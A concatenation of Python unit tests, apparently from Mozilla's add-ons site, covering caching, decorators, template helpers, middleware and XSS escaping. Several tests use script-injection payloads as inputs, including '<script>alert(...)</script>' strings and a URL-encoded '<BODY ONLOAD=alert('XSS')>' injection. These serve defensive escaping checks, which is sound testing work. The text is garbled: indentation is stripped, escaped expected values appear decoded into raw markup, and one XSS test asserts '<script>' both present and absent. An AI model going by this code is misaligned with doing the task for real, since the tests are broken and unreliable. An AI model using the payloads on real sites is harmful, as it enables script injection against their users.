dp = os.path.join(self.tmp, 'path')
with self.stor.open(os.path.join(dp, 'file.txt'), 'w') as fp:
fp.write('stuff')
self.stor.delete(dp)
def test_delete_file(self):
dp = os.path.join(self.tmp, 'path')
fn = os.path.join(dp, 'file.txt')
with self.stor.open(fn, 'w') as fp:
fp.write('stuff')
self.stor.delete(fn)
eq_(os.path.exists(fn), False)
eq_(os.path.exists(dp), True)
class TestCacheNamespaces(unittest.TestCase):
def setUp(self):
cache.clear()
self.namespace = 'redis-is-dead'
@mock.patch('amo.utils.epoch')
def test_no_preexisting_key(self, epoch_mock):
epoch_mock.return_value = 123456
eq_(cache_ns_key(self.namespace), '123456:ns:%s' % self.namespace)
@mock.patch('amo.utils.epoch')
def test_no_preexisting_key_incr(self, epoch_mock):
epoch_mock.return_value = 123456
eq_(cache_ns_key(self.namespace, increment=True),
'123456:ns:%s' % self.namespace)
@mock.patch('amo.utils.epoch')
def test_key_incr(self, epoch_mock):
epoch_mock.return_value = 123456
cache_ns_key(self.namespace) # Sets ns to 123456
ns_key = cache_ns_key(self.namespace, increment=True)
expected = '123457:ns:%s' % self.namespace
eq_(ns_key, expected)
eq_(cache_ns_key(self.namespace), expected)
class TestEscapeAll(unittest.TestCase):
def test_basics(self):
x = '-'.join([u, u])
y = ' - '.join([u, u])
tests = [
('<script>alert("BALL SO HARD")</script>',
'<script>alert("BALL SO HARD")</script>'),
(u'Bän...g (bang)', u'Bän...g (bang)'),
(u, u),
(x, x),
(y, y),
(u'x荿', u'x\u837f'),
(u'ϧ蒬蓣', u'\u03e7\u0383\u84ac\u84e3'),
(u'¿x', u'¿x'),
]
for val, expected in tests:
eq_(escape_all(val), expected)
def test_nested(self):
value = '<script>alert("BALL SO HARD")</script>'
expected = '<script>alert("BALL SO HARD")</script>'
test = {
'string': value,
'dict': {'x': value},
'list': [value],
'bool': True,
}
res = escape_all(test)
eq_(res['string'], expected)
eq_(res['dict'], {'x': expected})
eq_(res['list'], [expected])
eq_(res['bool'], True)
########NEW FILE########
__FILENAME__ = test_cron
from nose.tools import eq_
import amo.tests
from amo.cron import gc
from devhub.models import ActivityLog
from stats.models import Contribution
class GarbageTest(amo.tests.TestCase):
fixtures = ['base/addon_59', 'base/garbage']
def test_garbage_collection(self):
"This fixture is expired data that should just get cleaned up."
eq_(ActivityLog.objects.all().count(), 1)
eq_(Contribution.objects.all().count(), 1)
gc(test_result=False)
eq_(ActivityLog.objects.all().count(), 0)
eq_(Contribution.objects.all().count(), 0)
########NEW FILE########
__FILENAME__ = test_decorators
from datetime import datetime, timedelta
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
import mock
from nose import SkipTest
from nose.tools import eq_
import amo.tests
from amo import decorators, get_user, set_user
from amo.urlresolvers import reverse
from users.models import UserProfile
def test_post_required():
f = lambda r: mock.sentinel.response
g = decorators.post_required(f)
request = mock.Mock()
request.method = 'GET'
assert isinstance(g(request), http.HttpResponseNotAllowed)
request.method = 'POST'
eq_(g(request), mock.sentinel.response)
def test_json_view():
"""Turns a Python object into a response."""
f = lambda r: {'x': 1}
response = decorators.json_view(f)(mock.Mock())
assert isinstance(response, http.HttpResponse)
eq_(response.content, '{"x": 1}')
eq_(response['Content-Type'], 'application/json')
eq_(response.status_code, 200)
def test_json_view_normal_response():
"""Normal responses get passed through."""
expected = http.HttpResponseForbidden()
f = lambda r: expected
response = decorators.json_view(f)(mock.Mock())
assert expected is response
eq_(response['Content-Type'], 'text/html; charset=utf-8')
def test_json_view_error():
"""json_view.error returns 400 responses."""
response = decorators.json_view.error({'msg': 'error'})
assert isinstance(response, http.HttpResponseBadRequest)
eq_(response.content, '{"msg": "error"}')
eq_(response['Content-Type'], 'application/json')
def test_json_view_status():
f = lambda r: {'x': 1}
response = decorators.json_view(f, status_code=202)(mock.Mock())
eq_(response.status_code, 202)
def test_json_view_response_status():
response = decorators.json_response({'msg': 'error'}, status_code=202)
eq_(response.content, '{"msg": "error"}')
eq_(response['Content-Type'], 'application/json')
eq_(response.status_code, 202)
@mock.patch('django.db.transaction.commit_on_success')
def test_write(commit_on_success):
# Until we can figure out celery.delay issues.
raise SkipTest
@decorators.write
def some_func():
pass
assert not commit_on_success.called
some_func()
assert commit_on_success.called
class TestTaskUser(amo.tests.TestCase):
fixtures = ['base/users']
def test_set_task_user(self):
@decorators.set_task_user
def some_func():
return get_user()
set_user(UserProfile.objects.get(username='regularuser'))
eq_(get_user().pk, 999)
eq_(some_func().pk, int(settings.TASK_USER_ID))
eq_(get_user().pk, 999)
class TestLoginRequired(object):
def setUp(self):
self.f = mock.Mock()
self.f.__name__ = 'function'
self.request = mock.Mock()
self.request.user.is_authenticated.return_value = False
self.request.get_full_path.return_value = 'path'
def test_normal(self):
func = decorators.login_required(self.f)
response = func(self.request)
assert not self.f.called
eq_(response.status_code, 302)
eq_(response['Location'],
'%s?to=%s' % (reverse('users.login'), 'path'))
def test_no_redirect(self):
func = decorators.login_required(self.f, redirect=False)
response = func(self.request)
assert not self.f.called
eq_(response.status_code, 401)
def test_decorator_syntax(self):
# @login_required(redirect=False)
func = decorators.login_required(redirect=False)(self.f)
response = func(self.request)
assert not self.f.called
eq_(response.status_code, 401)
def test_no_redirect_success(self):
func = decorators.login_required(redirect=False)(self.f)
self.request.user.is_authenticated.return_value = True
func(self.request)
assert self.f.called
class TestSetModifiedOn(amo.tests.TestCase):
fixtures = ['base/users']
@decorators.set_modified_on
def some_method(self, worked):
return worked
def test_set_modified_on(self):
users = list(UserProfile.objects.all()[:3])
self.some_method(True, set_modified_on=users)
for user in users:
eq_(UserProfile.objects.get(pk=user.pk).modified.date(),
datetime.today().date())
def test_not_set_modified_on(self):
yesterday = datetime.today() - timedelta(days=1)
qs = UserProfile.objects.all()
qs.update(modified=yesterday)
users = list(qs[:3])
self.some_method(False, set_modified_on=users)
for user in users:
date = UserProfile.objects.get(pk=user.pk).modified.date()
assert date < datetime.today().date()
class TestPermissionRequired(amo.tests.TestCase):
def setUp(self):
self.f = mock.Mock()
self.f.__name__ = 'function'
self.request = mock.Mock()
@mock.patch('access.acl.action_allowed')
def test_permission_not_allowed(self, action_allowed):
action_allowed.return_value = False
func = decorators.permission_required('', '')(self.f)
with self.assertRaises(PermissionDenied):
func(self.request)
@mock.patch('access.acl.action_allowed')
def test_permission_allowed(self, action_allowed):
action_allowed.return_value = True
func = decorators.permission_required('', '')(self.f)
func(self.request)
assert self.f.called
@mock.patch('access.acl.action_allowed')
def test_permission_allowed_correctly(self, action_allowed):
func = decorators.permission_required('Admin', '%')(self.f)
func(self.request)
action_allowed.assert_called_with(self.request, 'Admin', '%')
########NEW FILE########
__FILENAME__ = test_ext
import jingo
import mock
from django.shortcuts import render
from nose.tools import eq_
@mock.patch('caching.ext.cache._cache_support')
def test_app_in_fragment_cache_key(cache_mock):
cache_mock.return_value = ''
request = mock.Mock()
request.APP.id = '<app>'
request.user.is_authenticated.return_value = False
request.groups = []
template = jingo.env.from_string('{% cache 1 %}{% endcache %}')
render(request, template)
assert cache_mock.call_args[0][0].endswith('<app>')
@mock.patch('caching.ext.cache._cache_support')
def test_fragment_cache_key_no_app(cache_mock):
cache_mock.return_value = 'xx'
template = jingo.env.from_string('{% cache 1 %}{% endcache %}')
eq_(template.render(), 'xx')
assert cache_mock.called
########NEW FILE########
__FILENAME__ = test_fields
from decimal import Decimal
from django import forms
from django.core.cache import cache
from django.core import exceptions
from nose.tools import eq_
from test_utils import ExtraAppTestCase
import amo
from amo.fields import SeparatedValuesField
from fieldtestapp.models import DecimalCharFieldModel
class DecimalCharFieldTestCase(ExtraAppTestCase):
fixtures = ['fieldtestapp/test_models.json']
extra_apps = ['amo.tests.fieldtestapp']
def setUp(self):
cache.clear()
def test_fetch(self):
o = DecimalCharFieldModel.objects.get(id=1)
eq_(o.strict, Decimal('1.23'))
eq_(o.loose, None)
def test_nullify_invalid_false(self):
val = Decimal('1.5')
o = DecimalCharFieldModel()
o.strict = val
try:
o.strict = 'not a decimal'
except exceptions.ValidationError:
pass
else:
assert False, 'invalid value did not raise an exception'
eq_(o.strict, val, 'unexpected Decimal value')
def test_nullify_invalid_true(self):
val = Decimal('1.5')
o = DecimalCharFieldModel()
o.loose = val
eq_(o.loose, val, 'unexpected Decimal value')
o.loose = 'not a decimal'
eq_(o.loose, None, 'expected None')
def test_save(self):
a = DecimalCharFieldModel()
a.strict = '1.23'
a.loose = 'this had better be NULL'
a.save()
b = DecimalCharFieldModel.objects.get(pk=a.id)
eq_(b.strict, Decimal('1.23'))
eq_(b.loose, None)
class SeparatedValuesFieldTestCase(amo.tests.TestCase):
def setUp(self):
self.field = SeparatedValuesField(forms.EmailField)
def test_email_field(self):
eq_(self.field.clean(u'[email protected], [email protected]'), u'[email protected], [email protected]')
def test_email_field_w_empties(self):
eq_(self.field.clean(u'[email protected],, \n,[email protected]'), u'[email protected], [email protected]')
def test_email_validation_error(self):
with self.assertRaises(exceptions.ValidationError):
self.field.clean(u'e')
with self.assertRaises(exceptions.ValidationError):
self.field.clean(u'[email protected], [email protected], e')
def test_url_field(self):
field = SeparatedValuesField(forms.URLField)
eq_(field.clean(u'http://hy.fr/,,http://yo.lo'),
u'http://hy.fr/, http://yo.lo/')
def test_alt_separator(self):
self.field = SeparatedValuesField(forms.EmailField, separator='#')
eq_(self.field.clean(u'[email protected]#[email protected]'), u'[email protected], [email protected]')
########NEW FILE########
__FILENAME__ = test_helpers
# -*- coding: utf-8 -*-
import mimetypes
import os
from datetime import datetime, timedelta
from urlparse import urljoin
from django.conf import settings
from django.core.files.uploadedfile import SimpleUploadedFile
from django.utils import encoding
import jingo
import test_utils
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery
import amo
import amo.tests
from amo import urlresolvers, utils, helpers
from amo.utils import ImageCheck
from versions.models import License
def render(s, context={}):
t = jingo.env.from_string(s)
return t.render(context)
def test_strip_html():
eq_('Hey Brother!', render('{{ "Hey <b>Brother!</b>"|strip_html }}'))
def test_currencyfmt():
eq_(helpers.currencyfmt(None, 'USD'), '')
eq_(helpers.currencyfmt(5, 'USD'), '$5.00')
def test_strip_html_none():
eq_('', render('{{ a|strip_html }}', {'a': None}))
eq_('', render('{{ a|strip_html(True) }}', {'a': None}))
def test_strip_controls():
# We want control codes like \x0c to disappear.
eq_('I ove you', helpers.strip_controls('I \x0cove you'))
def test_finalize():
"""We want None to show up as ''. We do this in JINJA_CONFIG."""
eq_('', render('{{ x }}', {'x': None}))
def test_slugify_spaces():
"""We want slugify to preserve spaces, but not at either end."""
eq_(utils.slugify(' b ar '), 'b-ar')
eq_(utils.slugify(' b ar ', spaces=True), 'b ar')
eq_(utils.slugify(' b ar ', spaces=True), 'b ar')
def test_page_title():
request = Mock()
request.APP = amo.THUNDERBIRD
title = 'Oh hai!'
s = render('{{ page_title("%s") }}' % title, {'request': request})
eq_(s, '%s :: Add-ons for Thunderbird' % title)
# pages without app should show a default
request.APP = None
s = render('{{ page_title("%s") }}' % title, {'request': request})
eq_(s, '%s :: Add-ons' % title)
# Check the dirty unicodes.
request.APP = amo.FIREFOX
s = render('{{ page_title(x) }}',
{'request': request,
'x': encoding.smart_str(u'\u05d0\u05d5\u05e1\u05e3')})
class TestBreadcrumbs(object):
def setUp(self):
self.req_noapp = Mock()
self.req_noapp.APP = None
self.req_app = Mock()
self.req_app.APP = amo.FIREFOX
def test_no_app(self):
s = render('{{ breadcrumbs() }}', {'request': self.req_noapp})
doc = PyQuery(s)
crumbs = doc('li>a')
eq_(len(crumbs), 1)
eq_(crumbs.text(), 'Add-ons')
eq_(crumbs.attr('href'), urlresolvers.reverse('home'))
def test_with_app(self):
s = render('{{ breadcrumbs() }}', {'request': self.req_app})
doc = PyQuery(s)
crumbs = doc('li>a')
eq_(len(crumbs), 1)
eq_(crumbs.text(), 'Add-ons for Firefox')
eq_(crumbs.attr('href'), urlresolvers.reverse('home'))
def test_no_add_default(self):
s = render('{{ breadcrumbs(add_default=False) }}',
{'request': self.req_app})
eq_(len(s), 0)
def test_items(self):
s = render("""{{ breadcrumbs([('/foo', 'foo'),
('/bar', 'bar')],
add_default=False) }}'""",
{'request': self.req_app})
doc = PyQuery(s)
crumbs = doc('li>a')
eq_(len(crumbs), 2)
eq_(crumbs.eq(0).text(), 'foo')
eq_(crumbs.eq(0).attr('href'), '/foo')
eq_(crumbs.eq(1).text(), 'bar')
eq_(crumbs.eq(1).attr('href'), '/bar')
def test_items_with_default(self):
s = render("""{{ breadcrumbs([('/foo', 'foo'),
('/bar', 'bar')]) }}'""",
{'request': self.req_app})
doc = PyQuery(s)
crumbs = doc('li>a')
eq_(len(crumbs), 3)
eq_(crumbs.eq(1).text(), 'foo')
eq_(crumbs.eq(1).attr('href'), '/foo')
eq_(crumbs.eq(2).text(), 'bar')
eq_(crumbs.eq(2).attr('href'), '/bar')
def test_truncate(self):
s = render("""{{ breadcrumbs([('/foo', 'abcd efghij'),],
crumb_size=5) }}'""",
{'request': self.req_app})
doc = PyQuery(s)
crumbs = doc('li>a')
eq_('abcd ...', crumbs.eq(1).text())
def test_xss(self):
s = render("{{ breadcrumbs([('/foo', '<script>')]) }}",
{'request': self.req_app})
assert '<script>' in s, s
assert '<script>' not in s
@patch('amo.helpers.urlresolvers.reverse')
def test_url(mock_reverse):
render('{{ url("viewname", 1, z=2) }}')
mock_reverse.assert_called_with('viewname', args=(1,), kwargs={'z': 2},
add_prefix=True)
render('{{ url("viewname", 1, z=2, host="myhost") }}')
mock_reverse.assert_called_with('viewname', args=(1,), kwargs={'z': 2},
add_prefix=True)
def test_url_src():
s = render('{{ url("addons.detail", "a3615", src="xxx") }}')
assert s.endswith('?src=xxx')
def test_urlparams():
url = '/en-US/firefox/search-tools/category'
c = {'base': url,
'base_frag': url + '#hash',
'base_query': url + '?x=y',
'sort': 'name', 'frag': 'frag'}
# Adding a query.
s = render('{{ base_frag|urlparams(sort=sort) }}', c)
eq_(s, '%s?sort=name#hash' % url)
# Adding a fragment.
s = render('{{ base|urlparams(frag) }}', c)
eq_(s, '%s#frag' % url)
# Replacing a fragment.
s = render('{{ base_frag|urlparams(frag) }}', c)
eq_(s, '%s#frag' % url)
# Adding query and fragment.
s = render('{{ base_frag|urlparams(frag, sort=sort) }}', c)
eq_(s, '%s?sort=name#frag' % url)
# Adding query with existing params.
s = render('{{ base_query|urlparams(frag, sort=sort) }}', c)
eq_(s, '%s?sort=name&x=y#frag' % url)
# Replacing a query param.
s = render('{{ base_query|urlparams(frag, x="z") }}', c)
eq_(s, '%s?x=z#frag' % url)
# Params with value of None get dropped.
s = render('{{ base|urlparams(sort=None) }}', c)
eq_(s, url)
# Removing a query
s = render('{{ base_query|urlparams(x=None) }}', c)
eq_(s, url)
def test_urlparams_unicode():
url = u'/xx?evil=reco\ufffd\ufffd\ufffd\u02f5'
utils.urlparams(url)
class TestSharedURL(amo.tests.TestCase):
def setUp(self):
self.webapp = Mock()
self.webapp.type = amo.ADDON_WEBAPP
self.webapp.app_slug = 'webapp'
self.addon = Mock()
self.addon.type = amo.ADDON_EXTENSION
self.addon.slug = 'addon'
self.addon.is_webapp.return_value = False
def test_addonurl(self):
expected = '/en-US/firefox/addon/addon/'
eq_(helpers.shared_url('addons.detail', self.addon), expected)
eq_(helpers.shared_url('apps.detail', self.addon), expected)
eq_(helpers.shared_url('detail', self.addon), expected)
eq_(helpers.shared_url('detail', self.addon, add_prefix=False),
'/addon/addon/')
def test_isotime():
time = datetime(2009, 12, 25, 10, 11, 12)
s = render('{{ d|isotime }}', {'d': time})
eq_(s, '2009-12-25T18:11:12Z')
s = render('{{ d|isotime }}', {'d': None})
eq_(s, '')
def test_epoch():
time = datetime(2009, 12, 25, 10, 11, 12)
s = render('{{ d|epoch }}', {'d': time})
eq_(s, '1261764672')
s = render('{{ d|epoch }}', {'d': None})
eq_(s, '')
def test_locale_url():
rf = test_utils.RequestFactory()
request = rf.get('/de', SCRIPT_NAME='/z')
prefixer = urlresolvers.Prefixer(request)
urlresolvers.set_url_prefix(prefixer)
s = render('{{ locale_url("mobile") }}')
eq_(s, '/z/de/mobile')
def test_external_url():
redirect_url = settings.REDIRECT_URL
secretkey = settings.REDIRECT_SECRET_KEY
settings.REDIRECT_URL = 'http://example.net'
settings.REDIRECT_SECRET_KEY = 'sekrit'
try:
myurl = 'http://example.com'
s = render('{{ "%s"|external_url }}' % myurl)
eq_(s, urlresolvers.get_outgoing_url(myurl))
finally:
settings.REDIRECT_URL = redirect_url
settings.REDIRECT_SECRET_KEY = secretkey
@patch('amo.helpers.urlresolvers.get_outgoing_url')
def test_linkify_bounce_url_callback(mock_get_outgoing_url):
mock_get_outgoing_url.return_value = 'bar'
res = urlresolvers.linkify_bounce_url_callback({'href': 'foo'})
# Make sure get_outgoing_url was called.
eq_(res, {'href': 'bar'})
mock_get_outgoing_url.assert_called_with('foo')
@patch('amo.helpers.urlresolvers.linkify_bounce_url_callback')
def test_linkify_with_outgoing_text_links(mock_linkify_bounce_url_callback):
def side_effect(attrs, new=False):
attrs['href'] = 'bar'
return attrs
mock_linkify_bounce_url_callback.side_effect = side_effect
# Without nofollow.
res = urlresolvers.linkify_with_outgoing('a text http://example.com link',
nofollow=False)
eq_(res, 'a text <a href="bar">http://example.com</a> link')
# With nofollow (default).
res = urlresolvers.linkify_with_outgoing('a text http://example.com link')
eq_(res, 'a text <a rel="nofollow" href="bar">http://example.com</a> link')
res = urlresolvers.linkify_with_outgoing('a text http://example.com link',
nofollow=True)
eq_(res, 'a text <a rel="nofollow" href="bar">http://example.com</a> link')
@patch('amo.helpers.urlresolvers.linkify_bounce_url_callback')
def test_linkify_with_outgoing_markup_links(mock_linkify_bounce_url_callback):
def side_effect(attrs, new=False):
attrs['href'] = 'bar'
return attrs
mock_linkify_bounce_url_callback.side_effect = side_effect
# Without nofollow.
res = urlresolvers.linkify_with_outgoing(
'a markup <a href="http://example.com">link</a> with text',
nofollow=False)
eq_(res, 'a markup <a href="bar">link</a> with text')
# With nofollow (default).
res = urlresolvers.linkify_with_outgoing(
'a markup <a href="http://example.com">link</a> with text')
eq_(res, 'a markup <a rel="nofollow" href="bar">link</a> with text')
res = urlresolvers.linkify_with_outgoing(
'a markup <a href="http://example.com">link</a> with text',
nofollow=True)
eq_(res, 'a markup <a rel="nofollow" href="bar">link</a> with text')
class TestLicenseLink(amo.tests.TestCase):
def test_license_link(self):
mit = License.objects.create(
name='MIT/X11 License', builtin=6, url='http://m.it')
copyright = License.objects.create(
name='All Rights Reserved', icons='copyr', builtin=7)
cc = License.objects.create(
name='Creative Commons', url='http://cre.at', builtin=8,
some_rights=True, icons='cc-attrib cc-noncom cc-share')
cc.save()
expected = {
mit: (
'<ul class="license"><li class="text">'
'<a href="http://m.it">MIT/X11 License</a></li></ul>'),
copyright: (
'<ul class="license"><li class="icon copyr"></li>'
'<li class="text">All Rights Reserved</li></ul>'),
cc: (
'<ul class="license"><li class="icon cc-attrib"></li>'
'<li class="icon cc-noncom"></li><li class="icon cc-share">'
'</li><li class="text"><a href="http://cre.at" '
'title="Creative Commons">Some rights reserved</a></li></ul>'),
}
for lic, ex in expected.items():
s = render('{{ license_link(lic) }}', {'lic': lic})
s = ''.join([s.strip() for s in s.split('\n')])
eq_(s, ex)
def test_license_link_xss(self):
mit = License.objects.create(
name='<script>', builtin=6, url='<script>')
copyright = License.objects.create(
name='<script>', icons='<script>', builtin=7)
cc = License.objects.create(
name='<script>', url='<script>', builtin=8,
some_rights=True, icons='<script> cc-noncom cc-share')
cc.save()
expected = {
mit: (
'<ul class="license"><li class="text">'
'<a href="<script>"><script></a></li></ul>'),
copyright: (
'<ul class="license"><li class="icon <script>"></li>'
'<li class="text"><script></li></ul>'),
cc: (
'<ul class="license"><li class="icon <script>"></li>'
'<li class="icon cc-noncom"></li><li class="icon cc-share">'
'</li><li class="text"><a href="<script>" '
'title="<script>">Some rights reserved</a></li></ul>'),
}
for lic, ex in expected.items():
s = render('{{ license_link(lic) }}', {'lic': lic})
s = ''.join([s.strip() for s in s.split('\n')])
eq_(s, ex)
def get_image_path(name):
return os.path.join(settings.ROOT, 'apps', 'amo', 'tests', 'images', name)
def get_uploaded_file(name):
data = open(get_image_path(name)).read()
return SimpleUploadedFile(name, data,
content_type=mimetypes.guess_type(name)[0])
class TestAnimatedImages(amo.tests.TestCase):
def test_animated_images(self):
img = ImageCheck(open(get_image_path('animated.png')))
assert img.is_animated()
img = ImageCheck(open(get_image_path('non-animated.png')))
assert not img.is_animated()
img = ImageCheck(open(get_image_path('animated.gif')))
assert img.is_animated()
img = ImageCheck(open(get_image_path('non-animated.gif')))
assert not img.is_animated()
def test_junk(self):
img = ImageCheck(open(__file__, 'rb'))
assert not img.is_image()
img = ImageCheck(open(get_image_path('non-animated.gif')))
assert img.is_image()
def test_site_nav():
r = Mock()
r.APP = amo.FIREFOX
assert 'id="site-nav"' in helpers.site_nav({'request': r})
def test_jinja_trans_monkeypatch():
# This tests the monkeypatch in manage.py that prevents localizers from
# taking us down.
render('{% trans come_on=1 %}% (come_on)s{% endtrans %}')
render('{% trans come_on=1 %}%(come_on){% endtrans %}')
render('{% trans come_on=1 %}%(come_on)z{% endtrans %}')
def test_absolutify():
eq_(helpers.absolutify('/woo'), urljoin(settings.SITE_URL, '/woo'))
eq_(helpers.absolutify('https://addons.mozilla.org'),
'https://addons.mozilla.org')
def test_timesince():
month_ago = datetime.now() - timedelta(days=30)
eq_(helpers.timesince(month_ago), u'1 month ago')
eq_(helpers.timesince(None), u'')
def test_f():
# This makes sure there's no UnicodeEncodeError when doing the string
# interpolation.
eq_(render(u'{{ "foo {0}"|f("baré") }}'), u'foo baré')
########NEW FILE########
__FILENAME__ = test_install
from amo.install import addons
from amo.tests import TestCase
from amo.urlresolvers import reverse
from amo.utils import urlparams
class InstallTests(TestCase):
def test_generic(self):
url = reverse('api.install')
r = self.client.get(urlparams(url,
addon_id='1',
addon_name='Status Watch'))
assert 'prompted to install Status Watch' in r.content
def test_byid(self):
url = reverse('api.install')
r = self.client.get(urlparams(url, addon_id='318202'))
assert 'prompted to install Twitter Address Search Bar' in r.content
def test_byname(self):
url = reverse('api.install')
r = self.client.get(urlparams(url, addon_key='prism'))
assert 'prompted to install Prism for Firefox' in r.content
def test_byidname(self):
url = reverse('api.install')
r = self.client.get(urlparams(url, addon_id='prism'))
assert 'prompted to install Prism for Firefox' in r.content
def test_redirect(self):
url = reverse('api.install')
r = self.client.get(urlparams(url, addon_id=424))
self.assertEqual(r.status_code, 301)
self.assertEqual(r['Location'], addons[424]['link'])
def test_bad_id(self):
url = reverse('api.install')
r = self.client.get(urlparams(url, addon_id='eleventy-one'))
self.assertEqual(r.status_code, 404)
def test_bad_key(self):
url = reverse('api.install')
r = self.client.get(urlparams(url, addon_key='unicorns'))
self.assertEqual(r.status_code, 404)
def test_xss(self):
url = reverse('api.install')
r = self.client.get(url + '?' + 'addon_id=252539%3C/script%3E%3CBODY%20ONLOAD=alert%28%27XSS%27%29%3E&addon_name=F1%20by%20Mozilla%20Labs&src=external-f1home')
assert '<BODY' not in r.content
########NEW FILE########
__FILENAME__ = test_locales
from django.utils.translation import trans_real
import tower
def test_amo_locale_not_in_django():
"""
We load gettext catalogs in this order:
django/locale/django.po
amo/locale/messages.po
If Django doesn't have a locale, it returns the en-us catalog as a
fallback. But then we take that catalog and merge in our z-messages.po.
That's no good because we just mixed some other locale into en-us.
This test will be invalid once Django gets an mn locale.
"""
tower.activate('mn')
en = trans_real._translations['en-US']
mn = trans_real._translations['mn']
assert en != mn
assert en._catalog != mn._catalog
########NEW FILE########
__FILENAME__ = test_log
"""Tests for the activitylog."""
from datetime import datetime
from nose.tools import eq_
import amo
import amo.tests
from addons.models import Addon
from users.models import UserProfile
class LogTest(amo.tests.TestCase):
def setUp(self):
u = UserProfile.objects.create(username='foo')
amo.set_user(u)
def test_details(self):
"""
If we get details, verify they are stored as JSON, and we get out what
we put in.
"""
a = Addon.objects.create(name='kumar is awesome',
type=amo.ADDON_EXTENSION)
magic = dict(title='no', body='way!')
al = amo.log(amo.LOG.DELETE_REVIEW, 1, a, details=magic)
eq_(al.details, magic)
eq_(al._details, '{"body": "way!", "title": "no"}')
def test_created(self):
"""
Verify that we preserve the create date.
"""
al = amo.log(amo.LOG.CUSTOM_TEXT, 'hi', created=datetime(2009, 1, 1))
eq_(al.created, datetime(2009, 1, 1))
########NEW FILE########
__FILENAME__ = test_messages
# -*- coding: utf-8 -*-
import django.contrib.messages as django_messages
from django.contrib.messages.storage import default_storage
from django.http import HttpRequest
from nose.tools import eq_
from tower import ugettext as _
from amo.messages import _make_message, info
def test_xss():
title = "<script>alert(1)</script>"
message = "<script>alert(2)</script>"
r = _make_message(title)
assert "<script>alert(1)</script>" in r
r = _make_message(None, message)
assert "<script>alert(2)</script>" in r
r = _make_message(title, title_safe=True)
assert "<script>alert(1)</script>" in r
r = _make_message(None, message, message_safe=True)
assert "<script>alert(2)</script>" in r
# Make sure safe flags are independent
r = _make_message(title, message_safe=True)
assert "<script>alert(1)</script>" in r
r = _make_message(None, message, title_safe=True)
assert "<script>alert(2)</script>" in r
def test_no_dupes():
"""Test that duplicate messages aren't saved."""
request = HttpRequest()
setattr(request, '_messages', default_storage(request))
info(request, 'Title', 'Body')
info(request, 'Title', 'Body')
info(request, 'Another Title', 'Another Body')
storage = django_messages.get_messages(request)
eq_(len(storage), 2, 'Too few or too many messages recorded.')
def test_l10n_dups():
"""Test that L10n values are preserved."""
request = HttpRequest()
setattr(request, '_messages', default_storage(request))
info(request, _('Title'), _('Body'))
info(request, _('Title'), _('Body'))
info(request, _('Another Title'), _('Another Body'))
storage = django_messages.get_messages(request)
eq_(len(storage), 2, 'Too few or too many messages recorded.')
def test_unicode_dups():
"""Test that unicode values are preserved."""
request = HttpRequest()
setattr(request, '_messages', default_storage(request))
info(request, u'Titlé', u'Body')
info(request, u'Titlé', u'Body')
info(request, u'Another Titlé', u'Another Body')
storage = django_messages.get_messages(request)
eq_(len(storage), 2, 'Too few or too many messages recorded.')
########NEW FILE########
__FILENAME__ = test_middleware
# -*- coding: utf-8 -*-
from django import http, test
from django.conf import settings
from commonware.middleware import ScrubRequestOnException
from mock import Mock, patch
from nose.tools import eq_
from pyquery import PyQuery as pq
from test_utils import RequestFactory
import amo.tests
from amo.middleware import NoAddonsMiddleware, NoVarySessionMiddleware
from amo.urlresolvers import reverse
from zadmin.models import Config, _config_cache
class TestMiddleware(amo.tests.TestCase):
def test_no_vary_cookie(self):
# We don't break good usage of Vary.
response = test.Client().get('/')
eq_(response['Vary'], 'Accept-Language, User-Agent, X-Mobile')
# But we do prevent Vary: Cookie.
response = test.Client().get('/', follow=True)
eq_(response['Vary'], 'X-Mobile, User-Agent')
@patch('django.contrib.sessions.middleware.'
'SessionMiddleware.process_request')
def test_session_not_used_api(self, process_request):
req = RequestFactory().get('/')
req.API = True
NoVarySessionMiddleware().process_request(req)
assert not process_request.called
@patch('django.contrib.sessions.middleware.'
'SessionMiddleware.process_request')
def test_session_not_used(self, process_request):
req = RequestFactory().get('/')
NoVarySessionMiddleware().process_request(req)
assert process_request.called
def test_redirect_with_unicode_get():
response = test.Client().get('/da/firefox/addon/5457?from=/da/firefox/'
'addon/5457%3Fadvancedsearch%3D1&lang=ja&utm_source=Google+%E3'
'%83%90%E3%82%BA&utm_medium=twitter&utm_term=Google+%E3%83%90%'
'E3%82%BA')
eq_(response.status_code, 301)
def test_trailing_slash_middleware():
response = test.Client().get(u'/en-US/about/?xxx=\xc3')
eq_(response.status_code, 301)
assert response['Location'].endswith('/en-US/about?xxx=%C3%83')
class AdminMessageTest(amo.tests.TestCase):
def test_message(self):
c = Config()
c.key = 'site_notice'
c.value = 'ET Sighted.'
c.save()
if ('site_notice',) in _config_cache:
del _config_cache[('site_notice',)]
r = self.client.get(reverse('home'), follow=True)
doc = pq(r.content)
eq_(doc('#site-notice').text(), 'ET Sighted.')
c.delete()
del _config_cache[('site_notice',)]
r = self.client.get(reverse('home'), follow=True)
doc = pq(r.content)
eq_(len(doc('#site-notice')), 0)
def test_hide_password_middleware():
request = RequestFactory().post('/', dict(x=1, password=2, password2=2))
request.POST._mutable = False
ScrubRequestOnException().process_exception(request, Exception())
eq_(request.POST['x'], '1')
eq_(request.POST['password'], '******')
eq_(request.POST['password2'], '******')
class TestNoAddonsMiddleware(amo.tests.TestCase):
@patch('amo.middleware.ViewMiddleware.get_name')
def process(self, name, get_name):
get_name.return_value = name
request = RequestFactory().get('/')
view = Mock()
return NoAddonsMiddleware().process_view(request, view, [], {})
@patch.object(settings, 'NO_ADDONS_MODULES',
('some.addons',))
def test_middleware(self):
self.assertRaises(http.Http404, self.process, 'some.addons')
self.assertRaises(http.Http404, self.process, 'some.addons.thingy')
assert not self.process('something.else')
########NEW FILE########
__FILENAME__ = test_models
from mock import Mock
from nose.tools import eq_
import amo.models
from amo.models import manual_order
from amo.tests import TestCase
from amo import models as context
from addons.models import Addon
class ManualOrderTest(TestCase):
fixtures = ('base/apps', 'base/addon_3615', 'base/addon_5299_gcal',
'base/addon_40')
def test_ordering(self):
"""Given a specific set of primary keys, assure that we return addons
in that order."""
semi_arbitrary_order = [40, 5299, 3615]
addons = manual_order(Addon.objects.all(), semi_arbitrary_order)
eq_(semi_arbitrary_order, [addon.id for addon in addons])
def test_skip_cache():
eq_(getattr(context._locals, 'skip_cache', False), False)
with context.skip_cache():
eq_(context._locals.skip_cache, True)
with context.skip_cache():
eq_(context._locals.skip_cache, True)
eq_(context._locals.skip_cache, True)
eq_(context._locals.skip_cache, False)
def test_use_master():
local = context.multidb.pinning._locals
eq_(getattr(local, 'pinned', False), False)
with context.use_master():
eq_(local.pinned, True)
with context.use_master():
